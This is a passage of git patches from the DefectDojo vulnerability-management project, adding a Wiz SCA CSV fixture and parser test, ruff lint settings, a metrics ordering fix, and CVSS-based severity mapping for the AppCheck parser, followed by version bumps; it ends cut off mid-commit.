+ID,WizURL,Name,CVSSSeverity,HasExploit,HasCisaKevExploit,FindingStatus,VendorSeverity,FirstDetected,LastDetected,ResolvedAt,ResolutionReason,Remediation,LocationPath,DetailedName,Version,FixedVersion,DetectionMethod,Link,Projects,AssetID,AssetName,AssetRegion,ProviderUniqueId,CloudProviderURL,CloudPlatform,Status,SubscriptionExternalId,SubscriptionId,SubscriptionName,Tags,ExecutionControllers,ExecutionControllersSubscriptionExternalIds,ExecutionControllersSubscriptionNames,CriticalRelatedIssuesCount,HighRelatedIssuesCount,MediumRelatedIssuesCount,LowRelatedIssuesCount,InfoRelatedIssuesCount,OperatingSystem,IpAddresses +3ea99668-721f-11ef-94e9-bb8aaa280b32,https://app.wiz.io/explorer/vulnerability-findings#~(entity~(~'3ea99668-721f-11ef-94e9-bb8aaa280b32*2cSECURITY_TOOL_FINDING)),CVE-2024-39474,Low,false,false,Open,Low,2024-08-28T03:02:01Z,2024-08-07T12:27:01Z,,,go get -u github.com/containerd/containerd,/home/kubernetes/bin/containerd-gcfs-grpc,github.com/containerd/containerd,1.4.0,1.5.11,Library,https://github.com/advisories/GHSA-c9cp-9c75-9v8c,MyProject; Ops_k8s,a2ca5de0-7223-11ef-af4c-032d5da2afbf,k8s-bigcorp-default-zone-0dd0efbc-46n6,us-central1,https://www.googleapis.com/compute/v1/projects/big-corp/zones/us-central1-f/instances/k8s-bigcorp-default-zone-0dd0efbc-46n6,https://console.cloud.google.com/compute/instancesDetail/zones/us-central1-f/instances/k8s-bigcorp-default-zone-0dd0efbc-46n6?project=MyProject,GCP,Active,Big-Corp,11edc986-d649-500f-ae57-01eb6e2e42d8,Big-Corp,"{""k8s-myproject-public-117f7861-node"":""k8s-myproject-public-117f7861-node"",""goog-k8s-cost-mgnt"":"""",""goog-gke-node"":"""",""goog-k8s-cluster-location"":""us-central1"",""goog-k8s-cluster-name"":""myproject-public"",""goog-k8s-node-pool-name"":""default-pool""}",[],,,0,0,0,0,0,Linux,10.110.208.6 +3ea9e0fa-721f-11ef-9fd4-c3ec645f4a2e,https://app.wiz.io/explorer/vulnerability-findings#~(entity~(~'3ea9e0fa-721f-11ef-9fd4-c3ec645f4a2e*2cSECURITY_TOOL_FINDING)),CVE-2024-36891,Medium,false,false,Open,Medium,2024-08-28T03:02:01Z,2024-08-07T12:27:11Z,,,go get -u k8s.io/apimachinery,/home/kubernetes/bin/log-counter,k8s.io/apimachinery,0.17.2,0.17.9,Library,https://github.com/advisories/GHSA-33c5-9fx5-fvjm,MyProject; Ops_k8s,d44b822c-7223-11ef-abf8-d719c8dbc602,k8s-bigcorp-default-zone-a0930315-p21b,us-central1,https://www.googleapis.com/compute/v1/projects/big-corp/zones/us-central1-c/instances/k8s-bigcorp-default-zone-a0930315-p21b,https://console.cloud.google.com/compute/instancesDetail/zones/us-central1-c/instances/k8s-bigcorp-default-zone-a0930315-p21b?project=MyProject,GCP,Active,Big-Corp,11edc986-d649-500f-ae57-01eb6e2e42d8,Big-Corp,"{""k8s-myproject-public-117f7861-node"":""k8s-myproject-public-117f7861-node"",""goog-k8s-cost-mgnt"":"""",""goog-gke-node"":"""",""goog-k8s-cluster-location"":""us-central1"",""goog-k8s-cluster-name"":""myproject-public"",""goog-k8s-node-pool-name"":""default-pool""}",[],,,0,0,0,0,0,Linux,10.110.208.15 +3eaa0422-721f-11ef-b00a-c772bc38a673,https://app.wiz.io/explorer/vulnerability-findings#~(entity~(~'3eaa0422-721f-11ef-b00a-c772bc38a673*2cSECURITY_TOOL_FINDING)),GHSA-c9cp-9c75-9v8c,Medium,false,false,Open,Medium,2024-08-28T05:52:53Z,2024-08-07T12:27:01Z,,,,,kernel,109.17800.218.33,109.17800.218.88,OS,https://cloud.google.com/container-optimized-os/docs/release-notes/m109#cos-109-17800-218-88_,MyProject; Ops_k8s,a2ca5de0-7223-11ef-af4c-032d5da2afbf,k8s-bigcorp-default-zone-0dd0efbc-46n6,us-central1,https://www.googleapis.com/compute/v1/projects/big-corp/zones/us-central1-f/instances/k8s-bigcorp-default-zone-0dd0efbc-46n6,https://console.cloud.google.com/compute/instancesDetail/zones/us-central1-f/instances/k8s-bigcorp-default-zone-0dd0efbc-46n6?project=MyProject,GCP,Active,Big-Corp,11edc986-d649-500f-ae57-01eb6e2e42d8,Big-Corp,"{""k8s-myproject-public-117f7861-node"":""k8s-myproject-public-117f7861-node"",""goog-k8s-cost-mgnt"":"""",""goog-gke-node"":"""",""goog-k8s-cluster-location"":""us-central1"",""goog-k8s-cluster-name"":""myproject-public"",""goog-k8s-node-pool-name"":""default-pool""}",[],,,0,0,0,0,0,Linux,10.110.208.6 +3ea965b2-721f-11ef-8a61-83124251d18e,https://app.wiz.io/explorer/vulnerability-findings#~(entity~(~'3ea965b2-721f-11ef-8a61-83124251d18e*2cSECURITY_TOOL_FINDING)),CVE-2020-8559,Medium,false,false,Open,Medium,2024-08-28T03:02:01Z,2024-08-07T12:28:33Z,,,,,kernel,109.17800.218.33,109.17800.218.83,OS,https://cloud.google.com/container-optimized-os/docs/release-notes/m109#cos-109-17800-218-83_,MyProject; Ops_k8s,045832bc-7224-11ef-baf5-2fe1c91669e7,k8s-bigcorp-default-zone-2a743c24-8wcy,us-central1,https://www.googleapis.com/compute/v1/projects/big-corp/zones/us-central1-b/instances/k8s-bigcorp-default-zone-2a743c24-8wcy,https://console.cloud.google.com/compute/instancesDetail/zones/us-central1-b/instances/k8s-bigcorp-default-zone-2a743c24-8wcy?project=MyProject,GCP,Active,Big-Corp,11edc986-d649-500f-ae57-01eb6e2e42d8,Big-Corp,"{""k8s-myproject-public-117f7861-node"":""k8s-myproject-public-117f7861-node"",""goog-k8s-cost-mgnt"":"""",""goog-gke-node"":"""",""goog-k8s-cluster-location"":""us-central1"",""goog-k8s-cluster-name"":""myproject-public"",""goog-k8s-node-pool-name"":""default-pool""}",[],,,0,0,0,0,0,Linux,10.110.208.233 +3ea9bdfa-721f-11ef-8722-2fdfd8ca32bc,https://app.wiz.io/explorer/vulnerability-findings#~(entity~(~'3ea9bdfa-721f-11ef-8722-2fdfd8ca32bc*2cSECURITY_TOOL_FINDING)),CVE-2024-36891,Medium,false,false,Open,Medium,2024-08-28T03:02:01Z,2024-08-07T12:28:33Z,,,,,kernel,109.17800.218.33,109.17800.218.88,OS,https://cloud.google.com/container-optimized-os/docs/release-notes/m109#cos-109-17800-218-88_,MyProject; Ops_k8s,045832bc-7224-11ef-baf5-2fe1c91669e7,k8s-bigcorp-default-zone-2a743c24-8wcy,us-central1,https://www.googleapis.com/compute/v1/projects/big-corp/zones/us-central1-b/instances/k8s-bigcorp-default-zone-2a743c24-8wcy,https://console.cloud.google.com/compute/instancesDetail/zones/us-central1-b/instances/k8s-bigcorp-default-zone-2a743c24-8wcy?project=MyProject,GCP,Active,Big-Corp,11edc986-d649-500f-ae57-01eb6e2e42d8,Big-Corp,"{""k8s-myproject-public-117f7861-node"":""k8s-myproject-public-117f7861-node"",""goog-k8s-cost-mgnt"":"""",""goog-gke-node"":"""",""goog-k8s-cluster-location"":""us-central1"",""goog-k8s-cluster-name"":""myproject-public"",""goog-k8s-node-pool-name"":""default-pool""}",[],,,0,0,0,0,0,Linux,10.110.208.233 diff --git a/unittests/tools/test_wiz_parser.py b/unittests/tools/test_wiz_parser.py index 9d72c594126..a2d3975e4e9 100644 --- a/unittests/tools/test_wiz_parser.py +++ b/unittests/tools/test_wiz_parser.py @@ -40,5 +40,63 @@ def test_multiple_findings(self): self.assertEqual("Unusual activity by a principal from previously unseen country", finding.title) self.assertEqual("High", finding.severity) finding = findings[20] - self.assertEqual("User/service account with get/list/watch permissions on secrets in an AKS cluster", finding.title) + self.assertEqual( + "User/service account with get/list/watch permissions on secrets in an AKS cluster", finding.title, + ) self.assertEqual("Informational", finding.severity) + + def test_sca_format(self): + with open("unittests/scans/wiz/sca_format.csv", encoding="utf-8") as testfile: + parser = WizParser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(5, len(findings)) + + finding = findings[0] + self.assertEqual("github.com/containerd/containerd: CVE-2024-39474", finding.title) + self.assertEqual("Low", finding.severity) + self.assertEqual("github.com/containerd/containerd", finding.component_name) + self.assertEqual("1.4.0", finding.component_version) + self.assertIn("goog-k8s-cluster-location: us-central1", finding.unsaved_tags) + self.assertIn("CVE-2024-39474", finding.unsaved_vulnerability_ids) + self.assertIn("**Location Path**: `/home/kubernetes/bin/containerd-gcfs-grpc`", finding.description) + self.assertIn("**Location Path**: `/home/kubernetes/bin/containerd-gcfs-grpc`", finding.mitigation) + + finding = findings[1] + self.assertEqual("k8s.io/apimachinery: CVE-2024-36891", finding.title) + self.assertEqual("Medium", finding.severity) + self.assertEqual("k8s.io/apimachinery", finding.component_name) + self.assertEqual("0.17.2", finding.component_version) + self.assertIn("goog-k8s-cluster-location: us-central1", finding.unsaved_tags) + self.assertIn("CVE-2024-36891", finding.unsaved_vulnerability_ids) + self.assertIn("**Location Path**: `/home/kubernetes/bin/log-counter`", finding.description) + self.assertIn("**Location Path**: `/home/kubernetes/bin/log-counter`", finding.mitigation) + + finding = findings[2] + self.assertEqual("kernel: GHSA-c9cp-9c75-9v8c", finding.title) + self.assertEqual("Medium", finding.severity) + self.assertEqual("kernel", finding.component_name) + self.assertEqual("109.17800.218.33", finding.component_version) + self.assertIn("goog-k8s-cluster-location: us-central1", finding.unsaved_tags) + self.assertIn("GHSA-c9cp-9c75-9v8c", finding.unsaved_vulnerability_ids) + self.assertNotIn("**Location Path**:", finding.description) + self.assertNotIn("**Location Path**:", finding.mitigation) + + finding = findings[3] + self.assertEqual("kernel: CVE-2020-8559", finding.title) + self.assertEqual("Medium", finding.severity) + self.assertEqual("kernel", finding.component_name) + self.assertEqual("109.17800.218.33", finding.component_version) + self.assertIn("goog-k8s-cluster-location: us-central1", finding.unsaved_tags) + self.assertIn("CVE-2020-8559", finding.unsaved_vulnerability_ids) + self.assertNotIn("**Location Path**:", finding.description) + self.assertNotIn("**Location Path**:", finding.mitigation) + + finding = findings[4] + self.assertEqual("kernel: CVE-2024-36891", finding.title) + self.assertEqual("Medium", finding.severity) + self.assertEqual("kernel", finding.component_name) + self.assertEqual("109.17800.218.33", finding.component_version) + self.assertIn("goog-k8s-cluster-location: us-central1", finding.unsaved_tags) + self.assertIn("CVE-2024-36891", finding.unsaved_vulnerability_ids) + self.assertNotIn("**Location Path**:", finding.description) + self.assertNotIn("**Location Path**:", finding.mitigation) From c71226f4327184c301c57ab011285a9305833201 Mon Sep 17 00:00:00 2001 From: kiblik <5609770+kiblik@users.noreply.github.com> Date: Mon, 16 Sep 2024 04:39:44 +0200 Subject: [PATCH 16/62] Ruff: Add C90 (#10892) --- ruff.toml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/ruff.toml b/ruff.toml index bfd276cd709..858824074ea 100644 --- a/ruff.toml +++ b/ruff.toml @@ -28,13 +28,11 @@ exclude = [ ] [lint] -# Enable the pycodestyle (`E`) and Pyflakes (`F`) rules by default. -# Unlike Flake8, Ruff doesn't enable pycodestyle warnings (`W`) or -# McCabe complexity (`C901`) by default. select = [ "F", "E", "W", + "C90", "I", "D3", "UP", @@ -97,4 +95,7 @@ preview = true per-file-ignores = {} [lint.flake8-boolean-trap] -extend-allowed-calls = ["dojo.utils.get_system_setting"] \ No newline at end of file +extend-allowed-calls = ["dojo.utils.get_system_setting"] + +[lint.mccabe] +max-complexity = 70 # value is far from perfect (recommended default is 10). But we will try to decrease it over the time. From 3641886fb20ec54dbe1e0a46992e3ec0954a5ce3 Mon Sep 17 00:00:00 2001 From: kiblik <5609770+kiblik@users.noreply.github.com> Date: Mon, 16 Sep 2024 04:56:16 +0200 Subject: [PATCH 17/62] Ruff: Add ruff (#10893) Co-authored-by: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> --- ruff.toml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/ruff.toml b/ruff.toml index 858824074ea..5d3eecbe4d5 100644 --- a/ruff.toml +++ b/ruff.toml @@ -66,6 +66,7 @@ select = [ "PD", "PGH", "PLE", + "PLR0915", "PLW15", "TRY003", "TRY004", @@ -97,5 +98,8 @@ per-file-ignores = {} [lint.flake8-boolean-trap] extend-allowed-calls = ["dojo.utils.get_system_setting"] +[lint.pylint] +max-statements = 234 + [lint.mccabe] max-complexity = 70 # value is far from perfect (recommended default is 10). But we will try to decrease it over the time. From 2b1fd3d467ec6158cc5bf7c61418e230b2dc9bfd Mon Sep 17 00:00:00 2001 From: dogboat Date: Mon, 16 Sep 2024 13:08:55 -0400 Subject: [PATCH 18/62] Fix metrics aggregation (#10917) * metrics-aggregate-fix add an order_by() to aggregate_counts_by_period() so aggregation works properly * metrics-aggregate-fix replace single quotes with double quotes * retrigger github actions --- dojo/metrics/utils.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dojo/metrics/utils.py b/dojo/metrics/utils.py index 263b7065f2c..8ca345b41f7 100644 --- a/dojo/metrics/utils.py +++ b/dojo/metrics/utils.py @@ -500,7 +500,7 @@ def aggregate_counts_by_period( ) desired_values += ("closed",) - return severities_by_period.values(*desired_values) + return severities_by_period.order_by("grouped_date").values(*desired_values) def findings_by_product( From 86aeeffbd5747f672f72422b54f384bcd6e34a18 Mon Sep 17 00:00:00 2001 From: dogboat Date: Mon, 16 Sep 2024 13:52:06 -0400 Subject: [PATCH 19/62] appcheck-severity-determination-fix Use v4, v3, v2 cvss vectors for severity (#10918) * appcheck-severity-determination-fix Use v4, v3, v2 cvss vectors for determining severity in that order; update some type hints * appcheck-severity-determination-fix process cvss-base_score-related variables for severity determination first, then fall back to vectors, then default to "Info" * appcheck-severity-determination-fix fix typo --- .../engines/appcheck.py | 2 +- .../engines/base.py | 93 +++++++++++++++---- ...heck_web_application_scanner_many_vul.json | 2 +- ...appcheck_web_application_scanner_parser.py | 35 ++++++- 4 files changed, 107 insertions(+), 25 deletions(-) diff --git a/dojo/tools/appcheck_web_application_scanner/engines/appcheck.py b/dojo/tools/appcheck_web_application_scanner/engines/appcheck.py index ffcfa4b5632..ba29a780bc7 100644 --- a/dojo/tools/appcheck_web_application_scanner/engines/appcheck.py +++ b/dojo/tools/appcheck_web_application_scanner/engines/appcheck.py @@ -27,7 +27,7 @@ def extract_request_response(self, finding: Finding, value: dict[str, [str]]) -> value.pop("Messages") finding.unsaved_request, finding.unsaved_response = (d.strip() for d in rr_details[0]) - def parse_details(self, finding: Finding, value: dict[str, Union[str, dict[str, [str]]]]) -> None: + def parse_details(self, finding: Finding, value: dict[str, Union[str, dict[str, list[str]]]]) -> None: self.extract_request_response(finding, value) # super's version adds everything else to the description field return super().parse_details(finding, value) diff --git a/dojo/tools/appcheck_web_application_scanner/engines/base.py b/dojo/tools/appcheck_web_application_scanner/engines/base.py index 2b2f1cc1890..f45fd506698 100644 --- a/dojo/tools/appcheck_web_application_scanner/engines/base.py +++ b/dojo/tools/appcheck_web_application_scanner/engines/base.py @@ -5,6 +5,7 @@ import cvss.parser import dateutil.parser from cpe import CPE +from cvss.exceptions import CVSSError from django.core.exceptions import ImproperlyConfigured from dojo.models import Endpoint, Finding @@ -41,6 +42,35 @@ def escape_if_needed(x): return "".join([escape_if_needed(c) for c in s]) +def cvss_score_to_severity(score: float, version: int) -> str: + """ + Maps a CVSS score with a given version to a severity level. + Mapping from https://nvd.nist.gov/vuln-metrics/cvss (modified slightly to have "Info" in range [0.0, 0.1) for CVSS + v3/v4) + """ + cvss_score = float(score) + if version == 2: + if cvss_score >= 7.0: + severity = "High" + elif cvss_score >= 4.0: + severity = "Medium" + else: + severity = "Low" + else: + if cvss_score >= 9.0: + severity = "Critical" + elif cvss_score >= 7.0: + severity = "High" + elif cvss_score >= 4.0: + severity = "Medium" + elif cvss_score >= 0.1: + severity = "Low" + else: + severity = "Info" + + return severity + + ####### # Field parsing helper classes ####### @@ -122,7 +152,6 @@ class BaseEngineParser: * status -> active/false_p/risk_accepted (depending on value) * cves -> unsaved_vulnerability_ids (vulnerability_ids) * cpe -> component name/version - * cvss_vector -> severity (determined using CVSS package) * notes -> appended to Finding description * details -> appended to Finding description @@ -143,7 +172,6 @@ class BaseEngineParser: "status": Method("parse_status"), "cves": Method("parse_cves"), "cpe": Method("parse_components"), - "cvss_vector": Method("parse_severity"), # These should be listed after the 'description' entry; they append to it "notes": Method("parse_notes"), "details": Method("parse_details")} @@ -176,7 +204,7 @@ def parse_initial_date(self, finding: Finding, value: str) -> None: def is_cve(self, c: str) -> bool: return bool(c and isinstance(c, str) and self.CVE_PATTERN.fullmatch(c)) - def parse_cves(self, finding: Finding, value: [str]) -> None: + def parse_cves(self, finding: Finding, value: list[str]) -> None: finding.unsaved_vulnerability_ids = [c.upper() for c in value if self.is_cve(c)] ##### @@ -192,19 +220,6 @@ def parse_status(self, finding: Finding, value: str) -> None: elif value == "acceptable_risk": finding.risk_accepted = True - ##### - # For severity (extracted from cvss vector) - ##### - def get_severity(self, value: str) -> Optional[str]: - if cvss_obj := cvss.parser.parse_cvss_from_text(value): - if (severity := cvss_obj[0].severities()[0].title()) in Finding.SEVERITIES: - return severity - return None - - def parse_severity(self, finding: Finding, value: str) -> None: - if severity := self.get_severity(value): - finding.severity = severity - ##### # For parsing component data ##### @@ -217,7 +232,7 @@ def parse_cpe(self, cpe_str: str) -> (Optional[str], Optional[str]): (cpe_obj.get_version() and cpe_obj.get_version()[0]) or None, ) - def parse_components(self, finding: Finding, value: [str]) -> None: + def parse_components(self, finding: Finding, value: list[str]) -> None: # Only use the first entry finding.component_name, finding.component_version = self.parse_cpe(value[0]) @@ -236,12 +251,12 @@ def append_description(self, finding: Finding, addendum: dict[str, str]) -> None def parse_notes(self, finding: Finding, value: str) -> None: self.append_description(finding, {"Notes": value}) - def extract_details(self, value: Union[str, dict[str, Union[str, dict[str, [str]]]]]) -> dict[str, str]: + def extract_details(self, value: Union[str, dict[str, Union[str, dict[str, list[str]]]]]) -> dict[str, str]: if isinstance(value, dict): return {k: v for k, v in value.items() if k != "_meta"} return {"Details": str(value)} - def parse_details(self, finding: Finding, value: dict[str, Union[str, dict[str, [str]]]]) -> None: + def parse_details(self, finding: Finding, value: dict[str, Union[str, dict[str, list[str]]]]) -> None: self.append_description(finding, self.extract_details(value)) ##### @@ -282,6 +297,44 @@ def set_endpoints(self, finding: Finding, item: Any) -> None: endpoints = self.parse_endpoints(item) finding.unsaved_endpoints.extend(endpoints) + ##### + # For severity (extracted from various cvss vectors) + ##### + def parse_cvss_vector(self, value: str) -> Optional[str]: + # CVSS4 vectors don't parse with the handy-danty parse method :( + try: + if (severity := cvss.CVSS4(value).severity) in Finding.SEVERITIES: + return severity + except CVSSError: + pass + + if cvss_obj := cvss.parser.parse_cvss_from_text(value): + if (severity := cvss_obj[0].severities()[0].title()) in Finding.SEVERITIES: + return severity + return None + + def set_severity(self, finding: Finding, item: Any) -> None: + for base_score_entry, cvss_version in [ + ("cvss_v4_base_score", 4), + ("cvss_v3_base_score", 3), + ("cvss_base_score", 2), + ]: + if base_score := item.get(base_score_entry): + finding.severity = cvss_score_to_severity(base_score, cvss_version) + return + + for vector_type in ["cvss_v4_vector", "cvss_v3_vector", "cvss_vector"]: + if vector := item.get(vector_type): + if severity := self.parse_cvss_vector(vector): + finding.severity = severity + return + + finding.severity = "Info" + + def process_whole_item(self, finding: Finding, item: Any) -> None: + self.set_severity(finding, item) + self.set_endpoints(finding, item) + # Returns the complete field processing map: common fields plus any engine-specific def get_engine_fields(self) -> dict[str, FieldType]: return { @@ -302,7 +355,7 @@ def parse_finding(self, item: dict[str, Any]) -> Tuple[Finding, Tuple]: # Check first whether the field even exists on this item entry; if not, skip it if value := item.get(field): field_handler(self, finding, value) - self.set_endpoints(finding, item) + self.process_whole_item(finding, item) # Make a note of what scanning engine was used for this Finding self.append_description(finding, {"Scanning Engine": self.SCANNING_ENGINE}) return finding, self.get_finding_key(finding) diff --git a/unittests/scans/appcheck_web_application_scanner/appcheck_web_application_scanner_many_vul.json b/unittests/scans/appcheck_web_application_scanner/appcheck_web_application_scanner_many_vul.json index ee12493a840..052de390779 100644 --- a/unittests/scans/appcheck_web_application_scanner/appcheck_web_application_scanner_many_vul.json +++ b/unittests/scans/appcheck_web_application_scanner/appcheck_web_application_scanner_many_vul.json @@ -514,7 +514,7 @@ "cvss_score": 0.0, "type": "WEB_APP", "web_app": "https://example.x73zjffz.com", - "cvss_v4_vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:N/SA:N", + "cvss_v4_vector": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N", "mss_confirmed": false, "category": "web_app", "description": "[[markup]]This is simply a report of HTTP request methods supported by the web application.", diff --git a/unittests/tools/test_appcheck_web_application_scanner_parser.py b/unittests/tools/test_appcheck_web_application_scanner_parser.py index 8928f89abd6..ebe2186a24f 100644 --- a/unittests/tools/test_appcheck_web_application_scanner_parser.py +++ b/unittests/tools/test_appcheck_web_application_scanner_parser.py @@ -4,6 +4,7 @@ from dojo.tools.appcheck_web_application_scanner.engines.appcheck import AppCheckScanningEngineParser from dojo.tools.appcheck_web_application_scanner.engines.base import ( BaseEngineParser, + cvss_score_to_severity, escape_non_printable, strip_markup, ) @@ -96,7 +97,7 @@ def test_appcheck_web_application_scanner_parser_with_many_vuln_has_many_finding self.assertEqual("a25dae3aff97a06b6923b5fc9cc32826e1fd87ab", finding.unique_id_from_tool) self.assertEqual("Apache Tomcat < v9.0.0.M10 - External Control of Assumed-Immutable Web Parameter in JSP Servlet (CVE-2016-6796)", finding.title) self.assertEqual("2024-06-26", finding.date) - self.assertEqual("Medium", finding.severity) + self.assertEqual("High", finding.severity) self.assertEqual(True, finding.active) self.assertEqual("GET Request", finding.unsaved_request) self.assertEqual("Response", finding.unsaved_response) @@ -121,7 +122,7 @@ def test_appcheck_web_application_scanner_parser_with_many_vuln_has_many_finding self.assertEqual("02769aa244c456f0aad810354748faaa70d089c1129dc9c5", finding.unique_id_from_tool) self.assertEqual("Permitted HTTP Methods", finding.title) self.assertEqual("2024-06-27", finding.date) - self.assertEqual("Low", finding.severity) + self.assertEqual("Medium", finding.severity) self.assertEqual(True, finding.active) self.assertIsNone(finding.unsaved_request) self.assertIsNone(finding.unsaved_response) @@ -334,8 +335,15 @@ def test_appcheck_web_application_scanner_parser_base_engine_parser(self): # Invalid cvss vectors ("", None), ("AV:N/AC:H", None), + ("CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "High"), + ("CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:U/C:N/I:N/A:N", None), + ("CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:L/SI:H/SA:H", "Critical"), + ("CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N", "Medium"), + ("CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:H/SI:N/SA:H", "High"), + ("CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:N/SA:H", "Low"), + ("CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:A/VC:N/VI:N/VA:N/SC:N/SI:N/SA:N", None), ]: - self.assertEqual(severity, engine.get_severity(cvss_vector)) + self.assertEqual(severity, engine.parse_cvss_vector(cvss_vector)) # Test component parsing f = Finding() @@ -560,3 +568,24 @@ def test_appcheck_web_application_scanner_parser_non_printable_escape(self): ), ]: self.assertEqual(expected, escape_non_printable(test_string)) + + def test_appcheck_web_application_scanner_parser_cvss_score_mapping(self): + for cvss_score, version, expected in [ + # CVSSv2 + (0.0, 2, "Low"), (0.09, 2, "Low"), (0.1, 2, "Low"), (3.9, 2, "Low"), + (4.0, 2, "Medium"), (5.5, 2, "Medium"), (6.9, 2, "Medium"), + (7.0, 2, "High"), (8.3, 2, "High"), (10.0, 2, "High"), + # CVSSv3 + (0.0, 3, "Info"), (0.09, 3, "Info"), + (0.1, 3, "Low"), (1.2, 3, "Low"), (3.9, 3, "Low"), + (4.0, 3, "Medium"), (5.4, 3, "Medium"), (6.9, 3, "Medium"), + (7.0, 3, "High"), (8.3, 3, "High"), (8.9, 3, "High"), + (9.0, 3, "Critical"), (9.7, 3, "Critical"), (10.0, 3, "Critical"), + # CVSSv4 + (0.0, 4, "Info"), (0.09, 4, "Info"), + (0.1, 4, "Low"), (1.2, 4, "Low"), (3.9, 4, "Low"), + (4.0, 4, "Medium"), (5.4, 4, "Medium"), (6.9, 4, "Medium"), + (7.0, 4, "High"), (8.3, 4, "High"), (8.9, 4, "High"), + (9.0, 4, "Critical"), (9.7, 4, "Critical"), (10.0, 4, "Critical"), + ]: + self.assertEqual(expected, cvss_score_to_severity(cvss_score, version)) From 46fcef2b8efdf2dfbe088c6566378288daa4d04c Mon Sep 17 00:00:00 2001 From: DefectDojo release bot Date: Mon, 16 Sep 2024 18:29:53 +0000 Subject: [PATCH 20/62] Update versions in application files --- components/package.json | 2 +- dojo/__init__.py | 2 +- helm/defectdojo/Chart.yaml | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/components/package.json b/components/package.json index 49f5862eecd..c750020d3ae 100644 --- a/components/package.json +++ b/components/package.json @@ -1,6 +1,6 @@ { "name": "defectdojo", - "version": "2.39.0-dev", + "version": "2.38.2", "license" : "BSD-3-Clause", "private": true, "dependencies": { diff --git a/dojo/__init__.py b/dojo/__init__.py index 729d5f3ea8b..bac40506f9a 100644 --- a/dojo/__init__.py +++ b/dojo/__init__.py @@ -4,6 +4,6 @@ # Django starts so that shared_task will use this app. from .celery import app as celery_app # noqa: F401 -__version__ = "2.38.1" +__version__ = "2.38.2" __url__ = "https://github.com/DefectDojo/django-DefectDojo" __docs__ = "https://documentation.defectdojo.com" diff --git a/helm/defectdojo/Chart.yaml b/helm/defectdojo/Chart.yaml index 61744bdfbd6..8fcc60818ca 100644 --- a/helm/defectdojo/Chart.yaml +++ b/helm/defectdojo/Chart.yaml @@ -1,8 +1,8 @@ apiVersion: v2 -appVersion: "2.39.0-dev" +appVersion: "2.38.2" description: A Helm chart for Kubernetes to install DefectDojo name: defectdojo -version: 1.6.150-dev +version: 1.6.150 icon: https://www.defectdojo.org/img/favicon.ico maintainers: - name: madchap From 5abef72d9783332b60d8cb5ec05ba25f1e174300 Mon Sep 17 00:00:00 2001 From: DefectDojo release bot Date: Mon, 16 Sep 2024 19:14:35 +0000 Subject: [PATCH 21/62] Update versions in application files --- components/package.json | 2 +- dojo/__init__.py | 2 +- helm/defectdojo/Chart.yaml | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/components/package.json b/components/package.json index c750020d3ae..49f5862eecd 100644 --- a/components/package.json +++ b/components/package.json @@ -1,6 +1,6 @@ { "name": "defectdojo", - "version": "2.38.2", + "version": "2.39.0-dev", "license" : "BSD-3-Clause", "private": true, "dependencies": { diff --git a/dojo/__init__.py b/dojo/__init__.py index bac40506f9a..82fc1241506 100644 --- a/dojo/__init__.py +++ b/dojo/__init__.py @@ -4,6 +4,6 @@ # Django starts so that shared_task will use this app. from .celery import app as celery_app # noqa: F401 -__version__ = "2.38.2" +__version__ = "2.39.0-dev" __url__ = "https://github.com/DefectDojo/django-DefectDojo" __docs__ = "https://documentation.defectdojo.com" diff --git a/helm/defectdojo/Chart.yaml b/helm/defectdojo/Chart.yaml index 8fcc60818ca..9bd09f45faf 100644 --- a/helm/defectdojo/Chart.yaml +++ b/helm/defectdojo/Chart.yaml @@ -1,8 +1,8 @@ apiVersion: v2 -appVersion: "2.38.2" +appVersion: "2.39.0-dev" description: A Helm chart for Kubernetes to install DefectDojo name: defectdojo -version: 1.6.150 +version: 1.6.151-dev icon: https://www.defectdojo.org/img/favicon.ico maintainers: - name: madchap From d6286caa2c71d4c4af34ef289d4dd733547e21ee Mon Sep 17 00:00:00 2001 From: DefectDojo release bot Date: Mon, 16 Sep 2024 19:14:35 +0000 Subject: [PATCH 22/62] Update versions in application files --- components/package.json | 2 +- helm/defectdojo/Chart.yaml | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/components/package.json b/components/package.json index c750020d3ae..49f5862eecd 100644 --- a/components/package.json +++ b/components/package.json @@ -1,6 +1,6 @@ { "name": "defectdojo", - "version": "2.38.2", + "version": "2.39.0-dev", "license" : "BSD-3-Clause", "private": true, "dependencies": { diff --git a/helm/defectdojo/Chart.yaml b/helm/defectdojo/Chart.yaml index 8fcc60818ca..9bd09f45faf 100644 --- a/helm/defectdojo/Chart.yaml +++ b/helm/defectdojo/Chart.yaml @@ -1,8 +1,8 @@ apiVersion: v2 -appVersion: "2.38.2" +appVersion: "2.39.0-dev" description: A Helm chart for Kubernetes to install DefectDojo name: defectdojo -version: 1.6.150 +version: 1.6.151-dev icon: https://www.defectdojo.org/img/favicon.ico maintainers: - name: madchap From 79daae096aee8779ed59f591b46abbeeac52905b Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 16 Sep 2024 14:53:14 -0500 Subject: [PATCH 23/62] Bump ruff from 0.6.4 to 0.6.5 (#10909) Bumps [ruff](https://github.com/astral-sh/ruff) from 0.6.4 to 0.6.5. - [Release notes](https://github.com/astral-sh/ruff/releases) - [Changelog](https://github.com/astral-sh/ruff/blob/main/CHANGELOG.md) - [Commits](https://github.com/astral-sh/ruff/compare/0.6.4...0.6.5) --- updated-dependencies: - dependency-name: ruff dependency-type: direct:production update-type: 